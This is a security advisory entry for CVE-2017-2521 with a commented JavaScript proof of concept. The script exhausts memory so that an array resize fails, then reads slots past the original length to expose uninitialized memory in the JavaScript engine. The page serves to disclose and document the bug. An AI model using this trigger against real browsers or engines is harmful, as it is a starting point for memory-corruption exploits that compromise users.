CVE-2017-2521

  • Fix: May 2017
  • Credit: lokihardt, Google Project Zero

PoC

// Proof-of-concept script: it forces an array resize to fail under memory
// pressure, then checks what state the array was left in.
// NOTE(review): print() is not defined in this listing; presumably it is the
// output function of the JS shell the script is meant to run in.

// Initial element count: 0x200000 = 2,097,152.
const kArrayLength = 0x200000;

// Every slot in [0, kArrayLength) is filled with a reference to the same
// single object, so all initialized slots are truthy.
let arr = new Array(kArrayLength);
arr.fill({});

// Memory-pressure phase. The loop has no exit condition and ends only when an
// allocation (or the push) throws. Each buffer is kArrayLength * 8 * 8 bytes
// (128 MiB), and keeping them in `exh` holds them reachable.
// NOTE(review): the factor 8 * 8 looks like "8 bytes per element" times the
// x8 growth requested below, i.e. the size the grown array would need — confirm.
let exh = [];
try {
    for (;;) {
        exh.push(new ArrayBuffer(kArrayLength * 8 * 8));
    }
} catch (e) {
    // Deliberately ignored: the exception is the signal that allocation now
    // fails (presumably an out-of-memory error), which is the state wanted.
}

try {
    // Request an 8x larger length (0x1000000) while allocations are failing.
    arr.length *= 8;
    // No exception means the resize succeeded and the condition under test
    // was not reproduced in this run.
    print('failed');
} catch (e) {
    print(e);

    // Drop the only reference to the pressure buffers.
    // NOTE(review): presumably so the checks below have memory available again.
    exh = null;

    // The resize threw, so a consistent array would still report the original
    // length (0x200000). A larger value here means the length was updated even
    // though the operation failed.
    print('arr length: ' + arr.length.toString(16));
    // Walk only the indices past the original length; the script never wrote
    // to them. If the length is unchanged this loop body never runs, so any
    // truthy value printed comes from slots this script did not initialize.
    for (let i = kArrayLength, n = arr.length; i < n; i++) {
        if (arr[i])
            print(arr[i]);
    }
}

Reference